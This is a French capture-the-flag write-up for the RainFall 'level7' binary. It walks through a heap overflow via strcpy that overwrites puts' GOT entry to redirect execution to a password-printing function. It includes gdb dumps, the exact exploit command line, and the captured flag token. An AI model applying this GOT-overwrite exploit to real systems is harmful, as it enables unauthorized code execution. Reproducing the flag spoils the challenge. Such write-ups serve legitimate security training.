la fonction strcpy est vulnerable au buffer overflow


dans ce niveau on remarque que le mot de passe est stocker dans une variable global nommé c et qu'elle est afficher dans la fonction m.
  p3 = fopen("/home/user/level8/.pass", 0x80486e9);
  fgets(c, 0x44, p3);
  --------
  printf("%s - %d\n", c, t);

malheuresement cette fonction n'est jamais appele.

level7@RainFall:~$ ./level7 AAAAAAAAAAAAAAAAAAAAAAAA BBBB
Segmentation fault (core dumped)

(gdb) x/20 0x804a008    malloc 1
0x804a008:	0x00000001	0x0804a018	0x00000000	0x00000011
0x804a018:	0x00000000	0x00000000	0x00000000	0x00000011
						malloc 2
0x804a028:	0x00000002	0x0804a038	0x00000000	0x00000011
0x804a038:	0x00000000	0x00000000	0x00000000	0x00020fc1

en regardant de plus pret le tas on remarque que si le premier malloc est un peu trop remplis, il va venir ecraser l'addresse contenu dans le 2eme malloc.
or
   0x080485bd <+156>:	call   0x80483e0 <strcpy@plt>

le 2eme strcpy ce sert de cette valeur comme point de reecriture.

1 [        ][][][][][][][]
2 [ptr *3][][][][][][][]
3 [        ][][][][][][][]


une fois la variable c remplis du token. le programme fais appel a la fonction puts
et si on la regarde de plus pret on peut voir qu'il est possible de modifier son addresse. Il s'agit d'une addresse de linkage.

 (gdb) x/i 0x8048400
   0x8048400 <puts@plt>:	jmp    *0x8049928
(gdb) x 0x8049928
   0x8049928 <puts@got.plt>:	push   %es

Nous allons donc modifier cette addresse par l'addresse de la fonction m. (0x8049928)

 
 ce qu'il nous reste a faire et de passer en second parametre l'addresse de la fonction m et en premier parametre un nombre de caractere suffisant puis mettre l'addresse de puts

- 20 * A pour arriver jusqu'au pointeur du malloc dans lequel strcpy etait cencé réecrire
- on la remplace par l'addresse de linkage de puts '\x28\x99\x04\x08'

en 2eme parametre on lui donne l'adresse de m.

(gdb) disas m
Dump of assembler code for function m:
   0x080484f4 <+0>:	push   %ebp                   <--- addresse de m
   0x080484f5 <+1>:	mov    %esp,%ebp
   0x080484f7 <+3>:	sub    $0x18,%esp
   0x080484fa <+6>:	movl   $0x0,(%esp)
   0x08048501 <+13>:	call   0x80483d0 <time@plt>
   0x08048506 <+18>:	mov    $0x80486e0,%edx
   0x0804850b <+23>:	mov    %eax,0x8(%esp)
   0x0804850f <+27>:	movl   $0x8049960,0x4(%esp)
   0x08048517 <+35>:	mov    %edx,(%esp)
   0x0804851a <+38>:	call   0x80483b0 <printf@plt>
   0x0804851f <+43>:	leave
   0x08048520 <+44>:	ret
End of assembler dump.

 ./level7 $(python -c "print 'A'*20 + '\x28\x99\x04\x08'") $(python -c "print '\xf4\x84\x04\x08'")
5684af5cb4c8679958be4abe6373147ab52d95768e047820bf382e44fa8d8fb9
 - 1620048737